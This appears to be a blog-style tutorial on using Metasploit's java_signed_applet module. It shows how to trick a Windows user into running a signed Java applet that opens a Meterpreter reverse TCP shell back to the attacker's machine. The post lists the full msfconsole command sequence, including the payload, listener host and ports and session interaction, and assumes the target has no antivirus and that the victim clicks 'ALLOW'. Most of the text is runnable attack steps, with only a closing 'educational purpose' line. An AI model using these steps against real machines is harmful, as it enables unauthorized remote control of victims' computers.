metasploit

 

 

 

Yesterday i posted Exploiting Windows Os using  malicious DLL  code executions,  For  today  i am going  to  do  the same thing  but with different module   named   java signed applet social engineering code execution. Exploiting a windows velunurbility to login to remove system with out username and password using Metasploit

 

 

Requirements:

 

1. MetaSploit Installed ( Kali Linux Distribution)

 

2. Ruby Installed (Install all the package of Ruby to avoid any issues)

 

3. Two OS running either on same as virtual or physically different

 

4. Target host must not be running any AV

 

 

 

Machine 1:  Host   Kali  Linux  Machine

 

Machine 2: Target  any Windows  Machine

 

 

 

Msfconsole is by far the most popular part of the Metasploit Framework, and for good reason. It is one of the most flexible, feature-rich, and well-supported tools within the Framework. Msfconsole provides a handy all-in-one interface to almost every option and setting available in the Framework; it’s like a one-stop shop for all of your exploitation dreams.

 

 

 

To launch msfconsole, enter msfconsole at the command line

 

 

#msfconsole

 

 

Screenshot from 2014-05-21 13:14:19

 

Now once you get the msf prompt type the below command  and look for the module exploit/multi/browser/java_signed_applet.

 

 

 

 

An exploit is the means by which an attacker, or pen tester for that matter, takes advantage of a flaw within a system, an application, or a service. An attacker uses an exploit to attack a system in a way that results in a particular desired outcome that the developer never intended.

 

 

This exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs the it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim’s JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the “Publisher” line. Newer JVMs display “UNKNOWN” when the signature is not trusted (i.e., it’s not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks “run”, the applet executes with full user permissions.

 

 

 

Now once we have found the desired module we will use this exploit by typing the below command.

 

 

#msf > use  exploit/multi/browser/java_signed_applet

 

 

Screenshot from 2014-05-21 13:15:04

 

Once loaded your msf prompt should be inclusive of the loaded exploit. given below is the image

 

 

 

Now once the exploit is loaded we will set the payload for the above select exploit. In our scenario will be using reverse TCP payload. Type the below command to set payload.

 

 

 

A payload is code that we want the system to execute and that is to be selected and delivered by the Framework. A reverse shell is a payload that

creates a connection from the target machine back to the attacker as a Windows command prompt, whereas a bind shell is a payload that

“binds” a command prompt to a listening port on the target machine, which the attacker can then connect.

 

 

 

#msf > set payload windows/meterpreter/reverse_tcp

 

 

Screenshot from 2014-05-21 13:15:15

 

 

Now its time to do some configuration for the exploit/payload that we have just set. type the given command

 

 

 

#msf > show options

 

 

 

You should get below default output.

 

 

 

Now we have to set the local host to listen. Type the given below two commands.

 

 

 

#msf > set LHOST 192.168.31.20

 

 

Screenshot from 2014-05-21 13:15:22

 

 

This will be also be your HOST IP address running metasploit.

 

 

#msf >  set LPORT 443

 

#msf >  set SRVPORT 80

 

 

#msf >  set urlpath web

 

 

 

Screenshot from 2014-05-21 13:16:01

 

 

Now check if the above applied configuration is applied.

 

Now Finally we will start to exploit. Run the command Exploit.

 

 

#msf > exploit

 

Screenshot from 2014-05-21 13:17:51

 

 

Once executed we should “Server Started” (Make sure that your server is not running any web service on port 80)

 

On any Client machine simply open Internet Explorer and try to open http://192.168.31.20

 

 

a

 

 

Note: it will give your a pop-up asking from permission click ALLOW and Make sure you do not have any AntiVirus running on the target PC.

 

 

Once connection is established you should see something like below.

 

 

Screenshot from 2014-05-21 13:19:31

 

You can check the number of successful connected session by running the command sessons in msf console.

 

 

Now as we can see that we have one victim connected its time to login to the system. run the command session -i 1.

 

 

 

#meterpeter > session -i 1

 

 

Screenshot from 2014-05-21 13:19:47

 

Once connected type linux command to browse inside the System and have full control on it.

 

 

Screenshot from 2014-05-21 13:20:20

 

This Documentation is purely for educational purpose.

Advertisements